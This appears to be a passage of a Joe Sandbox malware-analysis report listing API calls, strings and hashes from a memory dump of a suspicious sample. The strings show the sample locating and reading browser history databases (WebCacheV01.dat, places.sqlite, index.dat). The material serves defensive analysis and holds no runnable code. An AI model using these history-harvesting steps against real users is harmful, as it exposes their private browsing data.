                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                            • API String ID: 71295984-2036018995
                                                            • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                            • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                            APIs
                                                            • wcschr.MSVCRT ref: 00414458
                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                            • String ID: "%s"
                                                            • API String ID: 1343145685-3297466227
                                                            • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                            • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                            • String ID: GetProcessTimes$kernel32.dll
                                                            • API String ID: 1714573020-3385500049
                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                            APIs
                                                            • memset.MSVCRT ref: 004087D6
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                            • memset.MSVCRT ref: 00408828
                                                            • memset.MSVCRT ref: 00408840
                                                            • memset.MSVCRT ref: 00408858
                                                            • memset.MSVCRT ref: 00408870
                                                            • memset.MSVCRT ref: 00408888
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 2911713577-0
                                                            • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                            • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                            APIs
                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: memcmp
                                                            • String ID: @ $SQLite format 3
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcsicmpqsort
                                                            • String ID: /nosort$/sort
                                                            APIs
                                                            • memset.MSVCRT ref: 0040E60F
                                                            • memset.MSVCRT ref: 0040E629
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Strings
                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                            Similarity
                                                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                            APIs
                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(02400048), ref: 0044DF01
                                                            • ??3@YAXPAX@Z.MSVCRT(02410050), ref: 0044DF11
                                                            • ??3@YAXPAX@Z.MSVCRT(00B56E78), ref: 0044DF21
                                                            • ??3@YAXPAX@Z.MSVCRT(02410458), ref: 0044DF31
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            APIs
                                                            Strings
                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                            Strings
                                                            Similarity
                                                            • API ID: ??3@DeleteObject
                                                            • String ID: r!A
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$memcmp
                                                            • String ID: $$8
                                                            APIs
                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E3EC
                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                            Similarity
                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                            • memset.MSVCRT ref: 00403A55
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            Strings
                                                            Similarity
                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                            • String ID: history.dat$places.sqlite
                                                            APIs
                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                            • GetLastError.KERNEL32 ref: 00417627
                                                            Similarity
                                                            • API ID: ErrorLast$File$PointerRead
                                                            • String ID:
                                                            Strings
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID: *.*$index.dat
                                                            • API String ID: 1974802433-2863569691
                                                            • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                            • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                            Similarity
                                                            • API ID: ErrorLast$FilePointer
                                                            • String ID:
                                                            • API String ID: 1156039329-0
                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            Similarity
                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                            • String ID:
                                                            • API String ID: 1125800050-0
                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                            APIs
                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                            • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseHandleSleep
                                                            • String ID: }A
                                                            • API String ID: 252777609-2138825249
                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                            APIs
                                                            • malloc.MSVCRT ref: 00409A10
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                            • free.MSVCRT ref: 00409A31
                                                            Similarity
                                                            • API ID: freemallocmemcpy
                                                            • String ID:
                                                            • API String ID: 3056473165-0
                                                            • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                            • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: BINARY
                                                            • API String ID: 2221118986-907554435
                                                            • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                            • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID: /stext
                                                            • API String ID: 2081463915-3817206916
                                                            • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                            • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                            Similarity
                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                            • String ID:
                                                            • API String ID: 2445788494-0
                                                            • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                            • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                            APIs
                                                            Strings
                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                            Similarity
                                                            • API ID: malloc
                                                            • String ID: failed to allocate %u bytes of memory
                                                            • API String ID: 2803490479-1168259600
                                                            • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                            • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                            • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                            • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                            APIs
                                                            • memset.MSVCRT ref: 0041BDDF
                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                            Similarity
                                                            • API ID: memcmpmemset
                                                            • String ID:
                                                            • API String ID: 1065087418-0
                                                            • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                            • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                            APIs
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                            Similarity
                                                            • API ID: memcpy$??2@
                                                            • String ID:
                                                            • API String ID: 3700833809-0
                                                            • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                            • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                            • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                            • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                            APIs
                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                            • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                            • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                            Similarity
                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                            • String ID:
                                                            • API String ID: 1381354015-0
                                                            • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                            • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                            APIs
                                                            • memset.MSVCRT ref: 004301AD
                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID:
                                                            • API String ID: 1297977491-0
                                                            • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                            • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
